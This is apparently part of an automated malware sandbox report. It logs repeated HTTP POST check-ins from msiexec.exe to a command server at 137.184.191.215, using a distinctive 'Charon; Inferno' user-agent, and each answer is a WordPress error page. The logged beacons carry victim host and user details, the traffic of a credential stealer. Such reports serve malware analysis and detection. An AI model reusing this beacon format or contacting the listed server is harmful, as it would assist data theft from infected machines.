                                Sep 30, 2024 10:03:51.612768888 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:51.612775087 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.449746137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:51.759485006 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:51.764343977 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:54.245615005 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:52 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:54.245687008 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:54.245723009 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.449747137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:54.400741100 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:54.406913042 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:57.201477051 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:54 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:57.201495886 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:57.201508045 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.449748137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:57.370493889 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:57.375312090 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:00.028433084 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:57 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:00.028454065 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:00.028465033 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.449749137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:00.185600996 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:00.190479040 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:02.782263041 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:00 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:02.782322884 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:02.782344103 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.449750137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:02.928149939 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:02.933068991 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:05.519123077 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:03 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:05.519140959 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:05.519151926 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:05.519161940 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.449751137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:05.673099995 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:05.678112984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:08.226331949 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:06 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
